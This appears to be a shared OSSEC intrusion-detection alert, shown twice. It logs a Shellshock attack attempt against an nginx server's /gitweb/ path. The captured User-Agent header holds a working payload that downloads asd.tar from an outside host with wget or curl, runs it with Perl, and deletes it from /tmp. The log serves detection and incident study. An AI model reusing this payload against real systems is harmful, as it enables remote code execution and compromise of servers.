burdzwastaken/ossec.skid.log

## ossec.skid.log
OSSEC HIDS Notification.
2016 Mar 20 09:38:57

Received From: ip->/var/log/nginx/access.log
Rule: 31151 fired (level 10) -> "Multiple web server 400 error codes from same source ip."
Portion of the log(s):

119.188.4.3 - - [20/Mar/2016:09:38:55 +0000] "GET /gitweb/ HTTP/1.1" 404 151 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget http://IP/asd.tar -O /tmp/asd.tar;curl -O /tmp/asd.tar http://IP/asd.tar ; perl /tmp/asd.tar; rm -fr /tmp/asd.tar;rm -rf /tmp/asd.*\x22);'"
	OSSEC HIDS Notification.
	2016 Mar 20 09:38:57

	Received From: ip->/var/log/nginx/access.log
	Rule: 31151 fired (level 10) -> "Multiple web server 400 error codes from same source ip."
	Portion of the log(s):

	119.188.4.3 - - [20/Mar/2016:09:38:55 +0000] "GET /gitweb/ HTTP/1.1" 404 151 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget http://IP/asd.tar -O /tmp/asd.tar;curl -O /tmp/asd.tar http://IP/asd.tar ; perl /tmp/asd.tar; rm -fr /tmp/asd.tar;rm -rf /tmp/asd.*\x22);'"